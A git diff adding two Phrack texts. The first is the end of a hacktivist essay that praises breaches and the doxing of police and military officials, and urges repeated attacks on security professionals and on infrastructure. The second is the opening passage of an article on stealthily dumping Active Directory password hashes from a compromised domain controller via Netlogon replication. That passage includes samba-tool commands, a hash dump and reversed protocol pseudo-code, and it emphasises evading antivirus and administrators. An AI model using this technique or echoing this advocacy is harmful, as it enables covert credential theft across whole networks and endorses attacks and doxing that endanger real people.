+Strutt's interview for GovExec.com [10] read: "'I've had to work hard to
+build up trust,' Strutt adds that he doesn't disclose his identity as a
+hacker to the people he refers to as his handlers. And he doesn't advertise
+to hackers that he works for the .mil or .gov community either". Most
+recently, r0d3nt voluntarily complied with a grand jury subpoena where he
+gave up the shell server "pinky" to the feds and kept quiet about it for
+months [11]. The shell server had several hundred accounts from other
+members of the 2600 community who now have the displeasure of knowing that
+law enforcement forensics are going through all their files and
+.bash_history logs. Strutt kept this a secret from everybody for months
+(complying with a clearly illegal "gag order") and has since been very
+vague about details, refusing to answer questions as to the specifics of
+the investigation except that law enforcement was looking for "a certain
+user"'s activity on the box. Of course it is reckless and stupid to use a
+community shell server to carry out attacks putting other users on the box
+in danger, but this is something you should be prepared for well ahead of
+time if you put yourself in such a place. Many ISPs that host websites and
+listservs for radicals and hackers not only have a clearly defined privacy
+policy reducing the amount of personally identifiable information on the
+box, but also have a "will not comply" statement that says they will never
+voluntarily give up the box.  This was demonstrated in November 2009 where
+IndyMedia.us received a similar gag order and subpoena asking for log files
+on the server (which never existed in the first place). The folks there
+immediately got the EFF involved and publicly announced the government's
+unjust fishing expedition, saying they had no plans on complying. In the
+end, nothing was given up and the gag order was found to be
+unconstitutional [12].
+
+Why do many of the big name hackers that are seen as role models end up
+being feds and corporate sellouts, and why are these people still welcomed
+and tolerated in the scene? Eric Corley of 2600 estimated that a quarter of
+hackers in the US are FBI informants [13], which is unfortunately an
+astonishingly high figure compared to other fields. Experienced criminals
+who have done prison time will tell you that the code of the street is
+don't trust anybody and don't rat.  If you ask many younger hackers,
+they'll casually joke about breaking into systems in their youth but if
+they ever grow up or get busted they'll be working for the government.
+Dealing with the devil never ends up well for anyone involved: all they
+want to do is bust other hackers, and in the end after using and abusing
+their informants they often kick them to the curb.
+
+Albert Gonzales (aka "soupnazi", "cumbajohnny", and "segvec") became an
+informant after he was busted in NYC for credit card fraud and was paid
+$75,000 to infiltrate carding websites like ShadowCrew. Despite his
+cooperation with the Secret Service where he sent several dozen hackers and
+fraudsters to prison as part of Operation Firewall, the feds STILL indicted
+Gonzales on some fresh credit card fraud charges of his own and sent his
+rat ass away for several decades. Unfortunately one of the people roped
+into Gonzales' web of deception was the notorious black hat Stephen Watt
+"the unix terrorist" who helped write old school zines like el8 and left a
+trail of mail spools, ownage logs, and rm'd servers of the most respected
+"security professionals" in the industry. Watt was never even charged with
+participating in any of Gonzales' money schemes but simply wrote some
+common packet sniffing code called 'blabla' which was supposedly used to
+help intercept credit card transactions in TJX's networks, demonstrating
+how depraved and desperate the feds are to make quotas and inflate the
+threat of hacker fraud artists in the media [14].
+
+While many support our fallen hacker comrades like the Unix Terrorist, we
+still hear a startling line of thought coming out of the infosec community.
+Ask around at your 2600 meeting or hackerspace and you'll hear a
+condemnation of imprisoned hackers as being nothing more than criminals
+along with a monologue comparable to politicians, police officers and the
+media: don't break into other people's systems, don't ddos, don't drop dox
+and if you find a vulnerability, "please please report it to the vendor so
+it could be patched." To think this mentality is being perpetuated by
+people who wave the hacker flag is disgusting and undermines the work that
+many legit hackers have fought and went to prison for.
+
+Because so many who claim to represent hackers end up working for the very
+corrupt and oppressive institutions that other hackers are fighting
+against, it is time to draw lines in the sand. If you are military, law
+enforcement or informant, work for a DOD contracted company or a private
+security firm hired to bust other hackers or protect the infrastructure we
+aim to destroy, you are no comrade of ours. This is 2011, the year of leaks
+and revolutions, and every day we hear about riots around the world, and
+how major corporations and government systems are getting owned by hackers.
+The papers have been describing recent events as a "cyberwar" (or more
+accurately, a "hacker class war") and the way the attacks have become more
+frequent and more damaging, this is not much of an exaggeration.
+
+It is impossible to talk about contemporary hacktivism without mentioning
+Anonymous, LulzSec and Antisec. Responsible for dramatically raising the
+stakes of this "war," they have adopted an increasingly explicit
+anti-government and anti-capitalist stance. The decentralized model in
+which Anonymous operates parallels every successful guerrilla warfare
+campaign waged throughout revolutionary history. In just a few months, they
+have taken aim at the CIA, the United States Senate, Infragard, Sony, NATO,
+AT&T, Viacom, Universal, IRCFederal, Booz Allen, Vanguard Defense
+Industries, as well as Texas, Missouri, Alabama, Arizona, Boston, and other
+police departments -- dropping massive username/password lists,
+confidential law enforcement documents, personal email correspondence and
+more. The latest campaign -- "Operation Antisecurity" -- is designed to
+unite other hacker groups, tipping their hats to old school antisec days
+while bringing more attention to anti-government black hat politics as has
+never before seen [15]. Although the attack methods being utilized have
+been relatively primitive-- ranging from common web application
+vulnerabilities like RFI/LFI and SQL injection, to brute force DDOS and
+botnet attacks-- there are signs that their attack methodology is becoming
+more sophisticated, especially as talent from allied hacker crews becomes
+involved. Additionally choice of targets are going after our bigger
+enemies: while past incarnations of antisec have humiliated many well-known
+sellouts in the computer security industry, today's blackhats are not
+scared to hit higher profile figures in law enforcement, military, and
+governments most notably by mercilessly dropping usernames, passwords, home
+addresses and phones, and social security numbers to tens of thousands of
+police and military officials.
+
+As hackers continue to expose and attack corruption, law enforcement will
+desperately continue to try to make high-profile arrests regardless of
+actual guilt or association. Especially as politicians continue to try to
+classify hacktivism as an act of cyber-terrorism (which can be retaliated
+against as traditional acts of war [16]), the threat of prison is very real
+and people should be well prepared ahead of time for all possible
+repercussions for their involvement. We should not, however, let the fear
+of government repression scare us into not taking action; instead, we
+should strengthen our movement by practicing better security culture and
+working to support other hackers who get busted in the line of duty. Even
+though there are plenty of guides out there on how to become "anonymous",
+many mistakes have already been made: trusting the mentally unstable 19
+year old Ryan Cleary to run the LulzSec IRC server, for example. Even
+before he was actively cooperating with the feds after being arrested in a
+joint US-UK operation, Ryan was already known to double-cross other
+hackers, having posted IP information of hundreds of anonops IRC users
+[17][18]. Although it's righteous to out snitches and movement traitors to
+the public, doxing other hackers involved in the struggle is only making
+law enforcement's job easier to identify and prosecute our comrades. Now
+more than ever should folks unite and practice solidarity with each other,
+setting aside our differences to go after our common enemies.
+
+The events over the past few months have been compared to the glory days of
+the 90s, complete with IRC wars and major website defacements. As breaking
+into computer systems becomes popularized and a new batch of young bloods
+are emerging on the scene, many questions remain. Is government going to
+make more arrests and pass more draconian laws? Would they be doing the
+same thing anyway-- even if hackers weren't striking back? Is Anonymous
+actually damaging the white-hat military and intelligence security
+industries with the ownings, defacements, and leaks, or are they just
+bringing heat on the underground while providing justification for more
+government financing of our enemies? Is this just another script kiddie
+scene thriving on sqlmap and milw0rm exploits or is there old school talent
+behind the scenes owning shit to keep the antisec flame alive? Most
+importantly, how can those fighting the hacker class war better coordinate
+their work with street-level resistance movements?
+
+As attacks intensify, no doubt governments will try to put more money into
+defending their infrastructure, holding more internal security trainings,
+and passing more laws increasing penalties for computer hacking as well as
+censoring and invading our privacy. The government propaganda machine will
+no doubt blame hackers as some sort of cyber-Al Queda to demonstrate the
+need for heightened security. Don't get it twisted: they have always wanted
+to pass these laws in the first place and would have done so with or
+without using the hacker threat as scapegoat, just as they wanted to go
+invade Afghanistan and Iraq and pass the PATRIOT Act before 9/11 ever
+happened. Don't be scared by ridiculous statements like FBI deputy
+assistance Steven Chabinsky who announced regarding the anonymous PayPal
+arrests, "We want to send a message that chaos on the Internet is
+unacceptable, [even if] hackers can be believed to have social causes, it's
+entirely unacceptable to break into websites and commit unlawful acts".
+Yes, the feds will continue to paint us as terrorists whether we act or not
+and will continue to make sweeping arrests regardless of guilt or innocence
+in an attempt to demonstrate that they aren't losing the cyberwar after all
+when all signs show that they are. It's widely speculated that the
+unexpected resignation of US-CERT director Randy Vickers is related to the
+dramatic increase in high-profile internet attacks against government
+institutions [20].
+
+Another sign of success is how the threat of being targeted by Anonymous
+and other anti-censorship activists could possibly scare the companies into
+not going forward with their plans, which is exactly what happened to
+Australian ISP Telstra [20]. A practice that seems to have been revived
+from old school black hat days is the targeting of security professionals
+and hackers who choose to sell out and work for corporations and
+governments to protect their systems.  This is an effective strategy
+because not only are they ridiculously incompetent and corrupt low-hanging
+fruit, but they likely hold private information on the cyberwar activities
+of the military. Additionally, hitting them hard and repeatedly will serve
+as a warning to others who would follow their lead and sell out their
+skills to the enemy: think twice before you find yourself in the
+crosshairs. What would happen when the government invests all this money to
+hire more hackers to protect their systems, but no one showed up?
+
+Hackers may brag about their antics instantly getting international news
+coverage but the offensive cyber operations of the US military are
+considerably quieter. Not only does this keep their enemies from knowing
+their capabilities but also because much of the work being done is likely
+illegal. As the saying goes, those who make the laws are allowed to break
+them. When teenagers hack into high profile systems, they're considered
+criminals and even terrorists; the governments and militaries of the world
+do the same at greater magnitudes while hiding behind the guises of
+national security or "spreading democracy." It might be a while before we
+ever hear about some of the operations hackers working for the military are
+involved in. Then again, it might not-- maybe they'll be the next ones
+owned, having their private data plastered all over the Internet.
+
+                                   ---
+
+[1] "President lays out cyberwar guidelines, report says"
+http://news.cnet.com/8301-13506_3-20073314-17/president-lays-out-cyberwar-
+guidelines-report-says/
+
+[2] "Stuxnet apparently as effective as a military strike"
+http://arstechnica.com/tech-policy/news/2010/12/stuxnet-apparently-as-
+effective-as-a-military-strike.ars
+
+[3] "Eagle Soars to Top of NPS"
+http://www.navy.mil/search/display.asp?story_id=2886
+
+[4] "Poke in the Eye to SANS and CISSPs in Defcon 18 CTF Announcement"
+http://sharpesecurity.blogspot.com/2010/04/poke-in-eye-to-sans-and-cissps-
+in.html
+
+[5] "Fuck FBI Friday Pretentious Press Statement"
+http://LulzSecurity.com/releases/fuck_fbi_friday_
+PRETENTIOUS%20PRESS%20STATEMENT.txt
+
+[6] "How One Man Tracked Down Anonymous And Paid a Heavy Price"
+http://www.wired.com/threatlevel/2011/02/anonymous/all/1
+
+[7] "Hacker 'Mudge' Gets DARPA Job"
+http://news.cnet.com/8301-27080_3-10450552-245.html
+
+[8] "Joint Statement Condemning LOU Cyberwar"
+http://www.2600.com/news/view/article/361
+
+[9] "Press Release - 2600 Magazine Condemns Denial of Service Attacks"
+http://www.2600.com/news/view/article/12037
+
+[10] "Hiring Hackers"
+http://www.govexec.com/features/1110-01/1110-01s1.htm
+
+[11] "Statement regarding Seizure of pinky.ratman.org shell server."
+http://foster.stonedcoder.org/~r0d3nt/statement.txt
+
+[12] "From EFF's Secret Files: Anatomy of a Bogus Subpoena"
+https://www.eff.org/wp/anatomy-bogus-subpoena-indymedia
+
+[13] "One in Four Hackers in the U.S. is an FBI Informant"
+http://publicintelligence.net/one-in-four-hackers-in-the-u-s-is-an-fbi-
+informant
+
+[14] "TJX Hacker Was Awash in Cash; His Penniless Coder Faces Prison"
+http://www.wired.com/threatlevel/2009/06/watt/
+
+[15] "50 Days of Mayhem: How LulzSec Changed Hacktivism Forever"
+http://www.pcmag.com/article2/0,2817,2387716,00.asp
+
+[16] "Pentagon to Consider Cyberattacks Acts of War"
+http://www.nytimes.com/2011/06/01/us/politics/01cyber.html
+
+[17] "Teenage 'Cyber Hacker' Son is Accused of Bringing Down 'British FBI'
+Site"
+http://www.dailymail.co.uk/news/article-2007345/Ryan-Cleary-Hacker-accused-
+bringing-British-FBI-site.html
+
+[18] "LOL ANONOPS DEAD"
+https://sites.google.com/site/lolanonopsdead/
+
+[19]"Agency Chief Tasked With Protecting Government Networks From Cyber
+Attacks Resigns"
+http://www.huffingtonpost.com/2011/07/25/chief-protecting-government-
+networks-resigns_n_909116.html
+
+[20] "Anonymous and LulzSecs Existence Scares ISP into Halting Web
+Censorship"
+http://www.zeropaid.com/news/93950/anonymous-and-LulzSecs-existence-scares-
+isp-into-halting-web-censorship/
+
+[21] "FBI Director Mueller Explains FBI Priorities 10 Years after 9/11"
+http://theiacpblog.org/2011/10/25/fbi-director-mueller-explains-fbi-
+priorities-10-years-after-911/
+
+[ EOF ]
diff --git a/phrack68/17.txt b/phrack68/17.txt
new file mode 100644
index 0000000..64f6bee
--- /dev/null
+++ b/phrack68/17.txt
@@ -0,0 +1,1776 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x11 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=-----=[ Abusing Netlogon to steal an Active Directory's secrets ]=-----=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------=[  by the p1ckp0ck3t  ]=-----------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------=[ anonymous_7406da@phrack.org ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+                                  <<<->>>
+
+  + Prologue
+  + Common tools & appropriate warnings!
+  + Meet the Samba 4 project
+  + Digging into the Netlogon replication mechanism
+  + Extracting the secrets
+  + A practical introduction to S4 (Stealth & Secure Secret Stealer)
+  + S4 .VS. Windows 2008 Domain Controllers
+  + Additional details
+  + Last words
+  + Bibliography
+  + c0de: S4
+
+                                  <<<->>>
+
+
+---[ 1 - Prologue
+
+
+If you've been hacking around Windows networks then you must be more than
+familiar with common LSA dumping tools such as pwdump [01] & co. You must
+also know that they are not only detected by (most?) AV, but furthermore
+that they may not work the expected way when an AV/HIPS is installed on
+your target. In the worst case a box may even crash! It's fucking annoying.
+
+In a Windows network, crashing a workstation is probably harmless (natural
+Windows behavior you could say) because administrators won't notice and its
+user will only complain. He may also kick the box, blame "fucking M$" and
+ultimately reboot it. But in the end, we all know that he will rather focus
+on the recovery of his Office document than look for evidence (assuming he
+has the required skills to begin with). The situation is entirely different
+when it comes to Windows servers and especially DC (Domain Controllers).
+For these kinds of target, one needs to be *very* cautious because an
+administrator would find a crash *very* suspicious.
+
+This paper presents a (hopefully) new technique to retrieve the AD (Active
+Directory [02])'s secrets using one of its (natural) replication mechanisms
+when a DC or a domain administrator's account has been compromised. Because
+it's solely based on the Windows API -without any hooks or (too) dirty
+tricks- it's a quiet efficient way to retrieve domain users' hashed
+passwords.
+
+
+---[ 2 - Common tools & appropriate warnings!
+
+
+Let me first begin by a bit of bitching regarding what's already available
+out there. There are a lot of tools dealing with "online" password dumping,
+most being open source, a few of them being however commercial software (I
+haven't tested those). Judging from my experience (and that of many
+friends) I can tell you that only a few of them are *really* of interest. I
+won't fill a bug report -:]- but remember that a good password dumping tool
+should provide:
+
+1. Stability:    Using such a tool should *never* be risky for the target's
+                 safety. Interactions with LSASS are really intrusive and
+                 dangerous and should be avoided if possible. You wouldn't
+                 use a kernel sploit without having first understood how
+                 and why it's working right? Same thing here. Crashing
+                 LSASS means crashing the box!
+
+2. Stealthiness: You should never take the risk to be caught by some
+                 AV/HIPS. It's no news that there are Windows APIs that you
+                 can't use anymore and it's obvious that binaries provided
+                 by a famous security website have a good chance to be
+                 detected.
+
+Take for example the case of fgdump & gsecdump. Both are great tools with a
+very good chance to succeed. But, can you seriously trust software that:
+
+    - Hook well known LSASS functions (using even more known techniques)?
+      (pwdump6 of fgdump)
+    - Parse internal LSASS memory? (gsecdump)
+    - Write well known (=> detected) dll & exe files on disk? (fgdump)
+    - Start new services? Stop AV services? (fgdump)
+    - Are closed source? (gsecdump)
+
+Especially with poorly designed AV/HIPS running on the same machine? Don't
+take me wrong, I'm not dissing pwdump* (or the similar) tools especially
+since they are necessary; but at least patch them a bit, you moron! In the
+case of a workstation target, there are no other public alternatives. But
+there's another story in the case of a DC target. What can be done in this
+matter?
+
+Let me tell you the story that months later would lead me to this paper.
+Because it's a story, some details are missing, especially in the reverse
+engineering work performed. The idea is to keep the paper simple, as well
+as to give you the opportunity to find the last pieces of the puzzle all by
+yourself; follow the hints, hacker :]
+
+
+---[ 3 - Meet the spart^wSamba 4 project
+
+
+Unix people are well aware of the Samba project but only a few of them are
+truly aware of how incredible this project really is. This is not just
+about mounting CIFS volumes, but a complete reverse engineering/rewrite of
+several parts of Windows. Kudos to the Samba team.
+
+A few years ago, the Samba team decided to start a new branch of their
+project: Samba 4 [03]. The goal was to provide an even deeper integration
+of a Samba server inside an Active Directory. Now with Samba 4, a Unix
+computer can become a (RO)DC and what's even more incredible is that it's
+as easy (well if you're lucky) as typing:
+
+------------------------------[ screendump ]-------------------------------
+# samba-tool join FOO.BAR DC -Uadministrator@foo.bar --realm=FOO.BAR
+---------------------------------------------------------------------------
+
+This command (dc)promotes our Linux box in the AD (in this case the domain
+is foo.bar). It's easy to check that it's indeed properly registered as a
+legitimate DC using for example an LDAP query:
+
+------------------------------[ screendump ]-------------------------------
+$ ldapsearch -x -LLL -h dc1.foo.bar -D "administrator@foo.bar" -W -b
+"OU=Domain Controllers,dc=foo,dc=bar" "(objectClass=Computer)" cn
+Enter LDAP Password: *******
+dn: CN=DC1,OU=Domain Controllers,DC=foo,DC=bar
+cn: DC1               <-- first DC
+
+dn: CN=MEDIA,OU=Domain Controllers,DC=foo,DC=bar
+cn: MEDIA             <-- second DC = our proud little Linux
+---------------------------------------------------------------------------
+
+As all traditional DC functions are properly running, Kerberos services are
+running as well to authenticate domain users whenever it is required:
+
+------------------------------[ screendump ]-------------------------------
+# samba-tool samdump
+[...]
+Administrator:500:BAC14D04669EE1D1AAD3B435B51404EE:\
+                  FBBF55D0EF0E34D39593F55C5F2CA5F2:[UX]:LCT-4F1B2611
+Guest:501:NO PASSWORDXXXXXXXXXXXXXXXXXXXXX:\
+          NO PASSWORDXXXXXXXXXXXXXXXXXXXXX:[NDUX]:LCT-00000000
+krbtgt:502:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
+           D25E142705B3C1B9122309D194E0B36F:[DU]:LCT-4F1B1EFC
+SUPPORT_388945a0:1001:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
+                      4CB5D040611B3FF00F17AF7DC344F97C:[DUX]:LCT-4F1B196F
+DC1$:1003:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
+          A59B7CDD1167816DFDD8C5F310ACCEC0:[S]:LCT-4F1B1F2F
+tofu:1117:E91851A7E394D006ABD3B435B31404EE:\
+          15221599C25FA333EA6044C0513ADD45:[UX]:LCT-4F1B23FB
+HAXOR$:1120:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
+            88369D133A118783D46D1C6344E99B08:[W]:LCT-4F1B366B
+cheese:1121:BC5F4D08D49A0099AAD3B43CB51404EE:\
+            3E21E05DD9E4E790CB3783D9292F80F7:[UX]:LCT-4F1BE1F2
+MEDIA$:1122:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:\
+            72CCE806701E837DCBB33B29A9D48E97:[S]:LCT-4F1C3AB1
+[...]
+---------------------------------------------------------------------------
+
+When I discovered how mature the Samba 4 project had become and what it
+allowed me to perform, I started to imagine how I could take advantage of
+the situation. The first idea I came up with was to introduce a temporary
+Samba 4 DC in the AD infrastructure, dump the passwords and immediately
+dcpromote it again (=remove it from the AD). However this idea is really
+bad regarding the criteria that I gave earlier:
+
+    - Stability: No matter how functional Samba 4 may appear, it's many
+      years too soon to use it for serious purpose. To give you an example,
+      I destroyed many testing environments as I was playing with Samba 4
+      (merely using it in fact).
+
+    - Stealthiness: I doubt there is even one person able to tell us how
+      many modifications the introduction of a new DC would bring in the
+      AD. Do you honestly think that you could introduce a DC, make it
+      disappear and that no administrator would ever be able to tell that
+      it was there? I'm not taking the risk and neither should you.
+
+For these two reasons, it was wise to resign (interestingly, as I would be
+told later, some French guy apparently didn't [04]).
+
+At this point, I had no more ideas until I realized that network traffic
+was exchanged between DC1 (another DC from the domain) and MEDIA when I was
+typing the samdump command. More precisely, and thanks to Wireshark's
+dissectors (courtesy of the Samba team), I was able to observe the
+following events:
+
+    1. NTLM Authentication Protocol used to authenticate MEDIA
+    2. MEDIA binding on \\DC3.FOO.BAR\IPC$\lsarpc and calling
+           -> lsa_OpenPolicy2()       (opnum 44)
+           -> lsa_QueryInfoPolicy2    (opnum 46)
+    3. MEDIA binding on \\DC3.FOO.BAR\IPC$\netlogon and calling
+           -> NetrServerReqChallenge  (opnum 4)
+           -> NetrServerAuthenticate2 (opnum 15)
+    4. MEDIA binding again (*) on \\DC3.FOO.BAR\IPC$\netlogon and calling
+           -> NetrDatabaseSync        (opnum 8)
+           -> NetrDatabaseSync        (opnum 8)
+           -> NetrDatabaseSync        (opnum 8)
+
+(* Using 2 different binds in step 3 & 4 seems weird at first but it will
+be explained later.)
+
+I was immediately interested in the NetrDatabaseSync() function and googled
+a bit to see if I could find some documentation. Fortunately, Microsoft
+documents this function; it is a wrapper of NetrDatabaseSync2() [05].
+
+-----------------------[ MS official documentation ]-----------------------
+NTSTATUS NetrDatabaseSync2(
+  [in, string] LOGONSRV_HANDLE PrimaryName,
+  [in, string] wchar_t* ComputerName,
+  [in] PNETLOGON_AUTHENTICATOR Authenticator,
+  [in, out] PNETLOGON_AUTHENTICATOR ReturnAuthenticator,
+  [in] DWORD DatabaseID,
+  [in] SYNC_STATE RestartState,
+  [in, out] unsigned long* SyncContext,
+  [out] PNETLOGON_DELTA_ENUM_ARRAY* DeltaArray,
+  [in] DWORD PreferredMaximumLength
+);
+[...]
+The NetrDatabaseSync2 method returns a set of all changes applied to the
+specified database since its creation. It provides an interface for a BDC
+to fully synchronize its databases to those of the PDC.
+[...]
+---------------------------------------------------------------------------
+
+So, it seemed safe to assume that the network traffic observed was the
+consequence of a synchronization mechanism. If you're familiar with Windows
+networks then there is something that should immediately draw your
+attention: the documentation is mentioning PDC (Primary Domain Controller)
+& BDC (Backup Domain Controller) which are pre-Windows2000 (= NT4)
+concepts. Indeed, Windows 2000 introduced Active Directory which uses a
+different logic. Wikipedia [06] explains it perfectly:
+
+-----------------[ Wikipedia: Primary Domain Controller ]------------------
+In later releases of Windows, domains have been supplemented by the use of
+Active Directory services. In Active Directory domains, the concept of
+primary and secondary domain controller relationships no longer applies.
+Primary domain controller emulators hold the accounts databases and
+administrative tools. [...] The same rules apply; only one PDC may exist on
+a domain, but multiple replication servers may still be used.
+---------------------------------------------------------------------------
+
+Note: "later releases" means Windows 2000 or above.
+
+So I came up with the conclusion that Samba 4 was (and still is) using an
+old -now emulated- mechanism to synchronize the AD database between its
+DCs. More precisely in Active Directory, a unique DC holds the PDC FSMO
+role [12], the other DCs being (emulated) BDC as a result. Now pay
+attention to the "DatabaseID" parameter passed to NetrDatabaseSync2():
+
+-----------------------[ MS official documentation ]-----------------------
+DatabaseID: The identifier for a specific database for which the changes
+are requested. It MUST be one of the following values.
+
+    Value                       Meaning
+    -----                       -------
+
+    0x00000000                  Indicates the SAM database.
+    0x00000001                  Indicates the SAM built-in database.
+    0x00000002                  Indicates the LSA database.
+---------------------------------------------------------------------------
+
+Assuming an attacker could call NetrDatabaseSync2() with DatabaseID=0 from
+an (emulated) BDC (= a compromised DC), then he would likely be able to
+retrieve the user database (SAM), which should include hashed passwords as
+well, right?
+
+I was very suspicious at first because the documentation wasn't mentioning
+anything about the LSA queries and lsa_QueryInfoPolicy2() is still
+currently undocumented (afaik). I was afraid that this would complicate
+things. I could have started to dig inside Samba 4's code (which is quite
+messy unfortunately) but I had instead a much better idea. What if this API
+was implemented in some native program available with Windows Server?
+
+Guess the answer.
+
+
+---[ 4 - Digging into the Netlogon replication mechanism
+
+
+If you're familiar with Windows sysadmin stuff then you must be well aware
+of the "Remote Server Administration Tools" [07] which provides a set of
+useful new commands for the CLI, including the one I was looking for:
+nltest.exe (now native under Windows 2008 FYI).
+
+Here is how Microsoft describes the tool:
+
+-----------------------[ MS official documentation ]-----------------------
+You can use nltest to:
+
+    Get a list of domain controllers
+
+    Force a remote shutdown
+
+    Query the status of trust
+
+    Test trust relationships and the state of domain controller replication
+    in a Windows domain
+
+    Force a user-account database to synchronize on Windows NT version 4.0
+    or earlier domain controllers      <-- synchronize + NT4 == JACKPOT?
+---------------------------------------------------------------------------
+
+The last sentence is interesting, right?
+
+Looking at the IAT of nltest.exe (for Windows 2003), I saw that there were
+entries for I_NetServerReqChallenge(), I_NetServerAuthenticate() and
+I_NetDatabaseSync(), all of them being imported from NETAPI32.dll and
+(strangely) undocumented.
+
+A short look at them convinced me that they were mere wrappers for RPC
+calls to (respectively) NetrServerReqChallenge(), NetrServerAuthenticate()
+and NetrDatabaseSync() located in netlogon.dll and obviously called using a
+binding to the named pipe \\%COMPUTERNAME%\IPC$\netlogon. What's cool with
+these functions is that they _are_ documented in [08] and a tiny
+modification apart, their prototypes match those of their NETAPI32.dll
+cousins.
+
+To make things even easier, I observed that all our targeted functions were
+called inside one big function, arbitrarily called SyncFunction() from now
+on. Reversing SyncFunction() was a task which proved to be really easy
+thanks to Microsoft's API documentation.
+
+Assuming DC2 requests a synchronization from its PDC (DC1), this gives the
+approximate pseudo-code (I omitted details about the assembly for
+clarification purposes, but you can find them in the uuencoded C code at
+the end of the article):
+
+-----------------------------[ SyncFunction() ]----------------------------
+
+    # Step 1:
+    # ClientChallenge is an 8 bytes array randomly chosen
+
+    RANDOM(ClientChallenge);
+
+    # Step 2:
+    # DC2 sends its challenge and requests one (also an 8 bytes array)
+    # from DC1
+
+    ZERO(ServerChallenge);
+    I_NetReqChallengeFunc(
+        (WCHAR) L"\\\\" + DC1_FQDN,
+        (WCHAR) DC2_HOSTNAME,
+        ClientChallenge,
+        [OUT] ServerChallenge);
+
+    # Step 3:
+    # The client creates a Unicode object out of its machine account name
+    # (suffix is '$') and hashes it using SystemFunction007() which is an
+    # MD4()
+    # The resulting hash (NTLM) is an 8 bytes array: MD4_HASH
+
+    UnicodeString(ComputerName, "DC2$")
+    ZERO(MD4_HASH);
+    SystemFunction007((UnicodeString)ComputerName, MD4_HASH);
+
+    # Step 4:
+    # To authenticate itself, the client will need to compute a new
+    # challenge (NewClientChallenge).
+    # To do so, the client builds a DES key (SessionKey) using the two
+    # challenges and the previously computed hash.
+
+    ZERO(SessionKey, 16);
+    NlMakeSessionKey(
+        MD4_HASH,
+        ClientChallenge,
+        ServerChallenge,
+        [OUT] SessionKey);
+
+    # Step 5:
+    # The client computes NewClientChallenge using SessionKey.
+
+    Encrypt000(
+        ClientChallenge,
+        [OUT] NewClientChallenge,
+        SessionKey);
+
+    # Step 6:
+    # The client sends NewClientChallenge to authenticate itself.
+    # If the answer is the correct one, the server will acknowledge
+    # the identity of the client and gives him back his own challenge
+    # (NewServerChallenge)
+
+    ZERO(NewServerChallenge);
+    I_NetServerAuthenticate(
+        (WCHAR) L"\\\\" + DC1_FQDN,
+        L"DC2$",                # DC2's machine account name
+        ServerSecureChannel = 6,
+        (WCHAR) L"DC2",         # DC2's hostname
+        NewClientChallenge,
+        [OUT] NewServerChallenge,
+        NegotiateFlags);
+
+    # Step 7:
+    # The client needs to know that he can trust the server so the
+    # authentication has to be _mutual_. Imagine if a rogue DC was sending
+    # a false SAM, this would allow an attacker to authenticate himself on
+    # DC2 using spoofed credentials.
+    #
+    # To check the identity of the server, NewServerChallenge must have
+    # been calculated using ServerChallenge and SessionKey which is common
+    # to DC1 and DC2.
+
+    Encrypt000(
+        ServerChallenge,
+        [OUT] ExpectedKey,
+        SessionKey);
+
+    if( NewServerChallenge != ExpectedKey )
+    {
+        exit(1);
+    }
+
+    # Step 8:
+    # For each type of database (DatabaseID), DC2 computes a new challenge
+    # which is stored in Authenticator and retrieves the database object
+    # DeltaArray. After each call, the client checks the authenticity of
+    # the data returned.
+
+    for(DatabaseID=0; DatabaseID<3; DatabaseID++)
+    {
+        NlBuildAuthenticator(
+            NewClientChallenge,
+            SessionKey,
+            [OUT] Authenticator);
+
+        ZERO(ReturnAuthenticator);
+        I_NetDatabaseSync(
+            (WCHAR) L"\\\\" + DC1_FQDN,
+            (WCHAR) DC2_HOSTNAME,
+            Authenticator,
+            ReturnAuthenticator,
+            DatabaseID,
+            SyncContext=0,
+            [OUT] DeltaArray,
+            -1);
+
+        if( NlUpdateSeed(
+                NewClientChallenge,
+                ReturnAuthenticator,
+                SessionKey) == 0 )
+        {
+            exit(1);
+        }
+    }
+---------------------------------------------------------------------------
+
+With the additional functions:
+
+-----------------------------[ subfunctions ]------------------------------
+
+# This function uses the 14 first bytes of SessionKey to compute
+# a new challenge out of an old one. Both challenges are 8 bytes
+# arrays.
+#
+# new = DES(DES(old))
+
+
+Encrypt000(
+    ClientChallenge,
+    NewChallenge,
+    SessionKey)
+{
+    BYTE TempOutput[8];
+
+    ZERO(NewChallenge);
+    SystemFunction001(ClientChallenge, SessionKey[0..6], TempOutput);
+    SystemFunction001(TempOutput, SessionKey[7..13], NewChallenge);
+
+    # TempOutput = DES(in=ClientChallenge, k=SessionKey[0..6])
+    # NewChallenge = DES(in=TempOutput, k=SessionKey[7..13])
+}
+
+                                    ---
+
+# The SessionKey is calculated using a combination of ClientChallenge
+# and ServerChallenge (to avoid replay attacks I believe).
+# Because client & server both know the MD4 value (a shared key between
+# them), they both can compute safely the SessionKey, but an attacker
+# without this knowledge will be unable to.
+
+NlMakeSessionKey(
+    MD4,
+    ClientChallenge,
+    ServerChallenge,
+    SessionKey)
+{
+    BYTE TempOut[8];
+
+    ZERO(SessionKey)
+    SessionKey[0..3] = ClientChallenge[0..3] + ServerChallenge[0..3];
+    SessionKey[4..7] = ClientChallenge[4..7] + ServerChallenge[4..7];
+
+    SystemFunction001(SessionKey[0..7], MD4[0..6], TempOut);
+    SystemFunction001(TempOut, MD4[9..15], SessionKey);
+
+    # TempOut = DES(SessionKey[0..7], MD4[0..6])
+    # SessionKey = DES(TempOut, MD4[9..15])
+}
+
+                                    ---
+
+# This function builds the Authenticator necessary for each
+# *DatabaseSync() call. The authenticator includes a Timestamp which is
+# used in the computation of the new Challenge.
+
+NlBuildAuthenticator(
+    NewClientChallenge,
+    SessionKey,
+    Authenticator
+    )
+{
+    FILETIME Time;
+    ZERO(Authenticator);
+    GetSystemTimeAsFileTime(Time);
+    RtlTimeToSecondsSince1970(
+        Time,
+        Authenticator->Timestamp);
+    NewClientChallenge[0..3] += Authenticator->Timestamp;
+    Encrypt000(
+        NewClientChallenge,
+        Authenticator->Credential,
+        SessionKey);
+}
+
+                                    ---
+
+# The server is supposed to acknowledge securely the request.
+# This function checks that the acknowledgment is indeed from
